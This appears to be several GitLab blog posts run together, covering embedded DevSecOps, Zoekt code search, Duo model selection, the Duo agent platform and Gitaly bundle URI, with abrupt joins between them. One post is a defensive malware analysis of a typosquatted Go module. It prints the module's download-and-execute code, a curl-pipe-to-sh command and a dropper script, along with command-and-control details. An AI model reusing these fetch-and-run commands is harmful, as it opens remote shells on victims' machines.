Products once defined primarily by their hardware are now differentiated by their software capabilities. The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to $1.24 trillion by 2030, a massive 34% compound annual growth rate. The software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain 650 million lines of code. Traditional embedded development approaches cannot handle this level of software complexity.

2. Hardware virtualization as a technical enabler

Hardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.

These virtualization technologies provide a foundation for continuous integration (CI). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.

3. The competitive and economic reality

Three interrelated forces are reshaping the competitive landscape for embedded development:

• The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.
• This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, SpaceX performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match.
• The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context and must switch contexts when results arrive. The problem worsens when defects enter the picture. Bugs become more expensive to fix the later they're discovered. Long feedback cycles magnify this problem in embedded systems.

Organizations are adopting embedded DevSecOps to help combat these challenges.

Priority transformation areas

Based on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways.

From hardware bottlenecks to continuous testing

Hardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral. Addressing this challenge requires a multifaceted approach including:

• Automating the orchestration of expensive shared hardware test benches among embedded developers
• Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines
• Standardizing builds with version-controlled environments

Embedded developers can accomplish this with GitLab's On-Premises Device Cloud, a CI/CD component. Through automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They also can catch more bugs early on in the software development lifecycle.

Automating compliance and security governance

Embedded systems face strict regulatory requirements. Manual compliance processes are unsustainable. Leading organizations are transforming how they comply with these requirements by:

• Replacing manual workflows with automated compliance frameworks
• Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines
• Automating approval workflows, enforcing code reviews, and maintaining audit trails
• Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C

This approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can fix and deploy bug fixes to vehicles within an hour of discovery. This level of scale and speed would be extremely difficult without automated compliance workflows.

Enabling collaborative innovation

Historically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows. As one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: "It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible." This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.

The window of opportunity

Embedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen. Organizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.

While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. Learn how to put these concepts into action with our guide: 4 ways to accelerate embedded development with GitLab.

To address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:

• Automated typosquatting detection, which identifies suspicious naming patterns
• Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions
• AI-assisted initial screening for advanced payload and obfuscation detection

This multi-layered approach is used by the vulnerability research team to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.

Using this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.

Executive summary: A MongoDB module that's not quite right

Our detection system flagged a newly published Go module called github.com/qiniiu/qmgo, closely mimicking the popular MongoDB module github.com/qiniu/qmgo. The legitimate module describes itself as "The Go driver for MongoDB" and has gained traction in the Go community.

To disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (qiniu → qiniiu). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.

The new module’s code was a working copy of the legitimate qmgo module. However, malicious code was inserted into the NewClient function in client.go, a function that developers would naturally call when initializing their MongoDB connection. Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.

After reporting the malicious module, it was removed within approximately 19 hours of our initial report. However, the threat actor quickly adapted, publishing a second typosquatted version (github.com/qiiniu/qmgo) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.

Technical deep dive: Peeling back the layers

The threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:

txt, err := script.Get("https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html").String()  
if err == nil {  
    txt2, err := script.Get(string(strings.Replace(txt, "\n", "", -1))).String()  
    if err == nil {  
        exec.Command("/bin/sh", "-c", string(txt2)).Start()  
    }  
}  

The attack unfolds in four distinct layers:

Layer 1: The code fetches update.html from another repository owned by the typosquat account qiiniu/vue-element-admin. The file contained a single line:

https://img.googlex.cloud/seed.php

Layer 2: The code then fetches https://img.googlex.cloud/seed.php, which returns a single shell command, which is executed:

curl -s http://207.148.110.29:80/logon61.gif|sh

Layer 3: The command tells the system to fetch http://207.148.110.29:80/logon61.gif using curl and execute the response as a shell script. The shell script downloads what appears to be an MP3 file (chainelli.mp3) to /tmp/vod, makes it executable, runs it, and immediately deletes it:

#!/bin/sh  
rm -rf /tmp/vod  
curl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  
chmod 777 /tmp/vod  
/tmp/vod  
rm -rf /tmp/vod  

Layer 4: The chainelli.mp3 file is actually a statically-linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at ellipal.spoolsv.cyou on Port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:

• Complete remote shell access and one-off command execution
• Screenshot captures
• SOCKS proxy functionality to make connections through the compromised machine
• Configurable sleep interval between check-ins with the command and control server to avoid detection
• Standard remote access trojan features like filesystem browsing and upload/download

They're back (already)

Just four days after GitLab reported the initial malicious module and saw it removed, github.com/qiiniu/qmgo appeared – the second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.

GitLab’s approach: Finding needles in haystacks

The initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:

Typosquatting detection: GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.

Semantic heuristics: Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.

AI-assisted analysis: A large language model does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.

Human review: A human receives an alert to verify the finding and to perform advanced analysis.

Recommendations: Staying ahead of persistent supply chain threats

This attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.

The quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.

We've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.

Indicators of compromise

How GitLab helps secure the software supply chain

Malicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes Application Security Testing scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production.

Paired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity.

Timeline

• 2025-06-01T09:31: GitLab reports github.com/qiniiu/qmgo to Go Security
• 2025-06-01T09:43: GitLab reports github.com/qiniiu/qmgo to GitHub
• 2025-06-01T10:14: GitLab reports ellipal.spoolsv.cyou (188.166.213.194) to the IP block owner
• 2025-06-02T04:03: Go Security takes down github.com/qiniiu/qmgo
• 2025-06-02T09:57: The IP block owner suspends 188.166.213.194
• 2025-06-03T09:15: GitHub suspends github.com/qiniiu
• 2025-06-05T17:15: GitLab reports github.com/qiiniu/qmgo to Go Security
• 2025-06-05T17:33: GitLab reports github.com/qiiniu/qmgo to GitHub
• 2025-06-05T17:45: Go Security takes down github.com/qiiniu/qmgo
• 2025-06-06T12:25: GitHub suspends github.com/qiiniu

Why traditional code search is challenging

Anyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.

These conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.

GitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After evaluating numerous options, we developed a better solution.

Introducing Exact Code Search: Three game-changing capabilities

Enter GitLab's Exact Code Search, currently in beta testing and powered by Zoekt (pronounced "zookt", Dutch for "search"). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.

This feature revolutionizes how you find and understand code with three key capabilities:

1. Exact Match mode: Zero false positives

When toggled to Exact Match mode, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:

• Searching for specific error messages
• Looking for particular function signatures
• Finding instances of specific variable names

2. Regular Expression mode: Powerful pattern matching

For complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:

• Find functions following specific naming patterns
• Locate variables matching certain constraints
• Identify potential security vulnerabilities using pattern matching

3. Multiple-line matches: See code in context

Instead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.

From features to workflows: Real-world use cases and impact

Let's see how these capabilities translate to real productivity gains in everyday development scenarios:

Debugging: From error message to root cause in seconds

Before Exact Code Search: Copy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.

With Exact Code Search:

1. Copy the exact error message
2. Paste it into Exact Code Search with Exact Match mode
3. Instantly find the precise location where the error is thrown, with surrounding context

Impact: Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.

Code exploration: Master unfamiliar codebases quickly

Before Exact Code Search: Browse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.

With Exact Code Search:

• Search for key methods or classes with Exact Match mode
• Review multiple line matches to understand implementation details
• Use Regular Expression mode to find similar patterns across the codebase

Impact: Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.

Refactoring with confidence

Before Exact Code Search: Attempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.

With Exact Code Search:

• Use Exact Match mode to find all occurrences of methods or variables
• Review context to understand usage patterns
• Plan your refactoring with complete information about impact

Impact: Eliminate the "missed instance" bugs that often plague refactoring efforts, improving code quality and reducing rework.

Security auditing: Finding vulnerable patterns

Security teams can:

• Create regex patterns matching known vulnerable code
• Search across all repositories in a namespace
• Quickly identify potential security issues with context that helps assess risk

Impact: Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.

Cross-repository insights

Search across your entire namespace or instance to:

• Identify similar implementations across different projects
• Discover opportunities for shared libraries or standardization

Impact: Break down silos between projects and identify opportunities for code reuse and standardization.

The technical foundation: How Zoekt delivers speed and precision

Before diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.

Positional trigrams: The secret to lightning-fast exact matches

Zoekt's speed comes from its use of positional trigrams — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.

Here's how it works:

Traditional full-text search engines like Elasticsearch tokenize code into words and lose positional information. When you search for getUserId(), they might return results containing user, get, and Id scattered throughout a file — leading to those frustrating false positives for GitLab users.

Zoekt's positional trigrams maintain exact character sequences and their positions. When you search for getUserId(), Zoekt looks for the exact trigrams like get, etU, tUs, Use, ser, erI, rId, Id(", "d(), all in the correct sequence and position. This ensures that only exact matches are returned.

The result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was one of our most requested features for good reason - developers were losing significant time sifting through false positives.

Regular expression performance at scale

Zoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.

Built for enterprise scale

Exact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.

Handling terabytes of code with ease

On GitLab.com alone, our Exact Code Search infrastructure indexes and searches over 48 TB of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.

Self-registering node architecture

Our innovative implementation features:

• Automatic node registration: Zoekt nodes register themselves with GitLab
• Dynamic shard assignment: The system automatically assigns namespaces to nodes
• Health monitoring: Nodes that don't check in are automatically marked offline

This self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.

Distributed system with intelligent load balancing

Behind the scenes, Exact Code Search operates as a distributed system with these key components:

• Specialized search nodes: Purpose-built servers that handle indexing and searching
• Smart sharding: Code is distributed across nodes based on namespaces
• Automatic load balancing: The system intelligently distributes work based on capacity
• High availability: Multiple replicas ensure continuous operation even if nodes fail

Note: High availability is built into the architecture but not yet fully enabled. See Issue 514736 for updates.

Seamless security integration

Exact Code Search automatically integrates with GitLab's permission system:

• Search results are filtered based on the user's access rights
• Only code from projects the user has access to is displayed
• Security is built into the core architecture, not added as an afterthought

Optimized performance

• Efficient indexing: Large repositories are indexed in tens of seconds
• Fast query execution: Most searches return results with sub-second response times
• Streaming results: The new gRPC-based federated search streams results as they're found
• Early termination: Once enough results are collected, the system pauses searching

From library to distributed system: Engineering challenges we solved

While Zoekt provided the core search technology, it was originally designed as a minimal library for managing .zoekt index files - not a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale"

Challenge 1: Building an orchestration layer

The problem: Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.

Our solution: We built a comprehensive orchestration layer that:

• Creates and manages database models to track nodes, indices, repositories, and tasks
• Implements a self-registering node architecture (inspired by GitLab Runner)
• Handles automatic shard assignment and load balancing across nodes
• Provides bidirectional API communication between GitLab Rails and Zoekt nodes

Challenge 2: Scaling storage and indexing

The problem: How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?

Our solution: We implemented:

• Intelligent sharding: Namespaces are distributed across nodes based on capacity and load
• Independent replication: Each node independently indexes from Gitaly (our Git storage service), eliminating complex synchronization
• Watermark management: Sophisticated storage allocation that prevents nodes from running out of space
• Unified binary architecture: A single gitlab-zoekt binary that can operate in both indexer and webserver modes

Challenge 3: Permission Integration

The problem: Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.

Our solution: We built native permission filtering directly into the search flow:

• Search requests include user permission context
• Results are filtered to include only those the user can access in case permissions change before indexing completes

Challenge 4: Operational simplicity

The problem: Managing a distributed search system shouldn't require a dedicated team.

Our solution:

• Auto-scaling: Adding capacity is as simple as deploying more nodes - they automatically register and start handling work
• Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed
• Zero-configuration sharding: The system automatically determines optimal shard assignments

Gradual rollout: Minimizing risk at scale

Rolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:

Phase 1: Controlled testing (gitlab-org group)

We started by enabling Exact Code Search only for the gitlab-org group - our own internal repositories. This allowed us to:

• Test the system with real production workloads
• Identify and fix performance bottlenecks
• Streamline the deployment process
• Learn from real users' workflows and feedback

Phase 2: Performance validation and optimization

Before expanding, we focused on ensuring the system could handle GitLab.com's scale:

• Implemented comprehensive monitoring and alerting
• Validated storage management with real production data growth

Phase 3: Incremental customer expansion

We gradually expanded to customers interested in testing Exact Code Search:

• Gathered feedback on performance and user experience
• Refined the search UI based on real user workflows
• Optimized indexing performance (large repositories like gitlab-org/gitlab now index in ~10 seconds)
• Refined the architecture based on operational learnings
• Massively increased indexing throughput and improved state transition livecycle

Phase 4: Broad rollout

Today, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:

• Toggle between regex and exact search modes
• Experience the benefits without any configuration changes
• Fall back to the previous search if needed (though few choose to)

Rolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.

For technical deep dive: Interested in the detailed architecture and implementation? Check out our comprehensive design document for in-depth technical details about how we built this distributed search system.

Getting started with Exact Code Search

Getting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).

Quickstart guide

1. Navigate to the Advanced Search in your GitLab project or group
2. Enter your search term in the code tab
3. Toggle between Exact Match and Regular Expression modes
4. Use filters to refine your search

Basic search syntax

Whether using Exact Match or Regular Expression mode, you can refine your search with modifiers:

Pro Tip: For the most efficient searches, start specific and then broaden if needed. Using file: and lang: filters dramatically increases relevance.

Advanced search techniques

Stack multiple filters for precision:

is_expected file:rb -file:spec

This finds "is_expected" in Ruby files that don't have "spec" in their name.

Use regular expressions for powerful patterns:

token.*=.*[\"']

Watch this search performed against the GitLab Zoekt repository.

The search helps find hardcoded passwords, which, if not found, can be a security issue.

For more detailed syntax information, check the Exact Code Search documentation.

Availability and deployment

Current availability

Exact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:

• Available for over 99% of licensed groups
• Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag

Self-managed deployment options

For self-managed instances, we offer several deployment methods:

• Kubernetes/Helm: Our most well-supported method, using our gitlab-zoekt Helm chart
• Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods

System requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.

What's coming next

While Exact Code Search is already powerful, we're continuously improving it:

• Scale optimizations to support instances with hundreds of thousands of repositories
• Improved self-managed deployment options, including streamlined Omnibus support
• Full high availability support with automatic failover and load balancing

Stay tuned for updates as we move from Beta to General Availability.

Transform how you work with code

GitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:

• No more wasting time with irrelevant results
• No more missing important matches
• No more clicking through files just to understand basic context
• No more performance issues as codebases grow

The impact extends beyond individual productivity:

• Teams collaborate better with easy code referencing
• Knowledge sharing accelerates when patterns are discoverable
• Onboarding becomes faster with quick codebase comprehension
• Security improves with effective pattern auditing
• Technical debt reduction becomes more feasible

Exact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.

We'd love to hear from you! Share your experiences, questions, or feedback about Exact Code Search in our feedback issue. Your input helps us prioritize improvements and new features.

Ready to experience smarter code search? Learn more in our documentation or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try a free, 60-day trial of GitLab Ultimate with Duo!

Meet GitLab Duo Model Selection, a powerful new capability that gives teams control over the large language models (LLMs) used in your organization. Available in private beta in the newly released GitLab 18.1 to all GitLab.com customers using Duo Enterprise, Duo Model Selection makes it easier to maintain governance, compliance, and security standards while helping accelerate innovation with agentic and generative AI. With Duo Model Selection, organizations can adopt GitLab Duo faster by selecting models from their pre-approved vendor list, versus the GitLab default model.

The benefits of GitLab Duo Model Selection

Duo Model Selection gives GitLab.com namespace owners control over which AI models teams can use across different GitLab Duo features, though those without specialized requirements are recommended to use the GitLab default model. With Duo Model Selection, you can:

• Configure models at the organization level: Set AI model preferences that apply across your organization’s entire namespace, ensuring consistent governance and compliance standards. Namespace owners can select models approved by their organization from GitLab's validated model catalog.

• Control models per GitLab Duo feature: Different GitLab Duo features can use different models based on your specific needs.

Watch Duo Model Selection in action:

<div style="padding:62.21% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1094452473?autoplay=1"badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Duo Model Selection Demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Join the Duo Model Selection private beta

Ready to take control of your AI governance? Duo Model Selection is currently in private beta for all GitLab.com customers using Duo Enterprise. To join the private beta, reach out to your GitLab account team. If you don’t have Duo, sign up for a GitLab Duo trial today!

Find out everything that's new and exciting, including agentic AI capabilities, in GitLab 18 with our on-demand launch event.

Imagine starting your day like this:

• You assign one AI agent to conduct deep research on an epic your team is working on, provide the latest updates on all contributions from the past week, and suggest a release post based on recent feature additions.
• In parallel, you delegate a handful of accessibility bugs to several agents for analysis and to make the necessary code changes to resolve them.
• Meanwhile, you ask another agent to review your complicated code changes and provide feedback before sending them to your teammate for formal review.
• Finally, when the security team pings you about a new vulnerability that needs investigation across your entire project, you hand that research task to your security agent.

All of this happens simultaneously, while you focus on architecture decisions, creative problem-solving, and strategic technical work. GitLab Duo Agent Platform will let you delegate tasks to five, 10, or even 100 specialized agents — all with full context of your project, not just your code, including CI job logs, planning work items, and so much more. You’re automating the tedious work you have to do, so you can focus on the work that inspires you.

This isn't about replacing developers. It's about amplifying human creativity and expertise by removing the friction from routine tasks. That’s the future we’re building with GitLab Duo Agent Platform.

What is GitLab Duo Agent Platform?

GitLab Duo Agent Platform will enable many-to-many collaboration between engineers and AI agents across the full software development lifecycle, designed to help teams dramatically improve productivity and cycle time.

Built on GitLab’s secure foundation, GitLab Duo Agent Platform is customizable and extendable. It empowers developers to build agents to tackle all kinds of software engineering problems, leveraging context across your entire software development lifecycle.

GitLab Duo Agent Platform will go beyond code creation with specialized agents and custom workflows that can help with a nearly unlimited list of activities, including:

• Issue implementation
• Large-scale migrations/dependency upgrades
• Automated documentation building/release posts
• Fixing broken pipelines
• Incident research support
• Deep research of status and information on topics
• Backlog administration
• Vulnerability resolution
• Reviews for specific types of code (e.g. database)
• Quick internal tool building based on existing build blocks
• and many more!

You will be able to use our agents out of the box as well as customize and extend them. We’re currently beta testing GitLab Duo Agent Platform with dozens of customers and will open beta access to more teams soon.

Watch GitLab Duo Agent Platform in action: <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1095679084?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Agent Platform Demo Clip"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Choose your tools, your models, and your agents

Consistent with GitLab’s commitment to being an open platform, GitLab agents will seamlessly interoperate with your choice of code-authoring developer tools via standard model context protocol (MCP) and the agent-to-agent (A2A) framework, whether you’re using Cursor, Claude Code, Windsurf, OpenAI Codex, or others.

The platform will accept code contributions from any development tool in your stack, whether that code was written by a human developer or generated by an AI agent. This means your existing workflows and preferred tools will continue to work seamlessly as you integrate agent capabilities.

GitLab Duo Agent Platform will work with any approved language model that meets our selection criteria. For organizations with strict security requirements, it will support approved self-hosted models running in completely air-gapped environments. Your infrastructure requirements and security policies won’t limit your ability to benefit from agentic development.

Context is everything, and your GitLab Duo agents have it

The difference between a helpful AI tool and a truly intelligent agent comes down to context. With GitLab Duo Agent Platform, agents don't work in isolation — they're deeply integrated into the platform where development work happens.

Every agent will automatically understand the full picture of your projects, including your open issues and their history, the merge requests that resolved them, the structure and rationale behind your code, your CI/CD pipeline configurations, security findings, compliance requirements, and the intricate relationships between all these components.

Just like your human team members, agents have all the context to help you ship secure software faster. Instead of just answering questions about code, they will be able to provide insights about how a proposed change might affect your deployment pipeline or suggest security improvements based on your existing compliance rules. We believe that the more your team works within GitLab’s DevSecOps platform, the smarter your agents will become.

Stay in control while agents scale your team

Building trust with AI agents isn't fundamentally different from building trust with new team members. You need to see their work, understand their approach, and gradually increase their responsibilities as they prove their competence.

That's the philosophy behind our agent approval workflow. Before any agent makes changes to your code or environment, it will present you with a clear plan: what it understands about the issue, the approach it will take, and the specific actions it wants to perform. You’ll then get the opportunity to review, approve, or redirect as needed. Over time, as agents consistently deliver quality work, you will be able to grant them greater autonomy for routine tasks while maintaining oversight for complex or critical work.

Built for community and customization

GitLab has always thrived on community contributions, and this year marked a milestone with record-breaking customer contributions to our platform. Now we're extending that same collaborative energy to AI agents through our open framework approach.

GitLab Duo Agent Platform isn't just about the agents we build — it's about empowering you and the broader community to create specialized agents that solve your unique engineering challenges. Whether you need an agent that understands your specific coding standards, integrates with your custom toolchain, or handles domain-specific tasks, the platform will give you the building blocks to make it happen.

This community-driven model creates a virtuous cycle that leverages the strength of the GitLab community through global sharing, similar to our CI/CD Catalog. Diverse real-world use cases drive innovation. Enterprise feedback ensures reliability and security. And shared solutions benefit everyone. It's the same collaborative approach that has made GitLab successful, now applied to the frontier of agentic development.

How to get started

If you've been experimenting with GitLab Duo Agentic Chat, now included with every GitLab 18 Premium and Ultimate GitLab.com user license, you've already gotten a taste of what's possible with AI agents in your development workflow.

To see what GitLab Duo Agent Platform can do and what we’re working on, check out the demos in the recording of our annual GitLab 18 release event.

Want to be among the first to experience it? Sign up for the GitLab Duo Agent Platform beta waitlist. This summer, we'll be opening access to more teams, with new agent features coming out in GitLab 18's upcoming releases throughout the year. We expect general availability this winter.

Disclaimer: This presentation contains information related to upcoming products, features, and functionality. It is important to note that the information in this presentation is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this presentation and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.

Learn more

• From vibe coding to agentic AI: A roadmap for technical leaders
• What is agentic AI?
• DevOps automation and AI agents
• AI-augmented software development: Agentic AI for DevOps
• AI-driven code analysis: The new frontier in code security

Bundle URI takes significant load off of Gitaly servers during clones by allowing Git to pre-download a bundled repository from object storage before calling the Gitaly servers to fetch the remaining objects.

Here is a graph that shows the difference between clones without and with bundle URI.

This graph shows the results of a small test we ran on an isolated GitLab installation, with Gitaly running on a machine with 2 CPUs. We wanted to test bundle URI with a large repository, so we pushed the GitLab repository to the instance. We also generated a bundle beforehand.

The big CPU spike is from when we performed a single clone of the GitLab repository with bundle URI disabled. It's quite noticeable. A little later, we turned on bundle URI and launched three concurrent clones of the GitLab repository. Sure enough, turning on bundle URI provides massive performance gain. We can't even distinguish the CPU usage of the three clones from normal usage.

Configure Gitaly to use bundle URI

To enable bundle URI on your GitLab installation, there are a couple of things you need to configure.

Create a cloud bucket

Bundles need to be stored somewhere. The ideal place is in a cloud storage bucket. Gitaly uses the gocloud.dev library to read and write from cloud storage. Any cloud storage solution supported by this library can be used. Once you have a cloud bucket URL, you can add it in the Gitaly configuration here:

[bundle_uri]
go_cloud_url = "<bucket-uri>"

It must be noted that Gitaly does not manage the lifecycle of the bundles stored in the bucket. To avoid cost issues, object lifecycle policies must be enabled on the bucket in order to delete unused or old objects.

Enable the feature flags

There are two feature flags to enable:

• gitaly_bundle_generation enables auto-generation of bundles.

• gitaly_bundle_uri makes Gitaly advertise bundle URIs when they are available (either manually created or auto-generated) and allows the user to manually generate bundles.

These feature flags can be enabled at-large on a GitLab installation, or per repository. See the documentation on how to enable a GitLab feature behind a feature flag.

How to generate bundles

Gitaly offers two ways for users to use bundle URI: a manual way and an auto-generated way.

Manual

It is possible to create a bundle manually by connecting over SSH with the Gitaly node that stores the repository you want to create a bundle for, and run the following command:

sudo -u git -- /opt/gitlab/embedded/bin/gitaly bundle-uri 
--config=<config-file>
--storage=<storage-name>
--repository=<relative-path>

This command will create a bundle for the given repository and store it into the bucket configured above. When a subsequent git clone request will reach Gitaly for the same repository, the bundle URI mechanism described above will come into play.

Auto-generated

Gitaly can also generate bundles automatically, using a heuristic to determine if it is currently handling frequent clones for the same repository.

